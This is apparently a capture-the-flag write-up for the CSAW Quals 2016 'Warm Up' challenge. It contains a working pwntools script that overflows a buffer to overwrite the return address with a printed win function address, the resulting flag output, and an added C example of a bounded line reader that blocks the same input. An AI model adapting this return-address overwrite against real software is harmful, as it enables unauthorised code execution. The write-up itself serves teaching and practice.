Filed under CSAW Quals 2016.

This was a very easy challenge. Basically, there was a win function at the address that is being printed: 0x40060D. This function can be called with a simple buffer overflow. Here is my Exploit.py:


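from pwn import *

# Address of the win function, as printed by the service
win = 0x40060D

# 72 bytes of padding, then the win address over the saved return address
payload = b"A" * 72
payload += p64(win)
con = remote('pwn.chal.csaw.io', 8000)

# Print the two banner lines, send the payload, then print the response
print(con.recvline().decode())
print(con.recvline().decode())
con.sendline(payload)
print(con.recvline().decode())

Which gave me the flag:
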
[+] Opening connection to pwn.chal.csaw.io on port 8000: Done
-Warm Up-

WOW:0x40060d

>FLAG{LET_US_BEGIN_CSAW_2016}

[*] Closed connection to pwn.chal.csaw.io port 8000
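
The defensive counterpart to the overflow above, as an added example that is not part of the original post or the challenge binary: a bounded line reader that truncates the 72 + 8 byte input instead of letting it reach the saved return address. The 64-byte buffer size and the names `read_line_bounded` and `demo` are assumptions, since the post does not show the binary's source.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 64 /* assumed buffer size; the challenge source is not in the post */

/* Read one line into dst (capacity cap), never writing past it.
 * Returns 0 if the whole line fit, 1 if it was truncated (the excess is
 * discarded so it cannot leak into the next read), -1 on EOF or error. */
int read_line_bounded(FILE *in, char *dst, size_t cap)
{
    if (cap == 0 || fgets(dst, (int)cap, in) == NULL)
        return -1;
    size_t n = strlen(dst);
    if (n > 0 && dst[n - 1] == '\n') {
        dst[n - 1] = '\0'; /* complete line: strip the newline */
        return 0;
    }
    /* No newline stored: drain the rest of the line and note any excess. */
    int c, extra = 0;
    while ((c = fgetc(in)) != EOF && c != '\n')
        extra = 1;
    return extra;
}

/* Constructed input: `pad` filler bytes plus 8 placeholder bytes standing in
 * for the packed address, fed through a temp file. Returns the reader's
 * result (-2 if no temp file) and stores the number of bytes kept. */
int demo(size_t pad, size_t *stored_len)
{
    char buf[BUF_SIZE];
    FILE *f = tmpfile();
    if (f == NULL)
        return -2;
    for (size_t i = 0; i < pad; i++)
        fputc('A', f);
    fputs("BBBBBBBB\n", f);
    rewind(f);
    int rc = read_line_bounded(f, buf, sizeof buf);
    *stored_len = (rc >= 0) ? strlen(buf) : 0;
    fclose(f);
    return rc;
}

int main(void)
{
    size_t kept = 0;
    int rc = demo(72, &kept); /* same 72 + 8 byte shape as the payload above */
    printf("truncated=%d kept=%zu of %d\n", rc, kept, BUF_SIZE);
    return 0;
}
```

With the assumed 64-byte buffer, the 80-byte line is cut to 63 bytes plus the terminator and reported as truncated, so the caller can reject it.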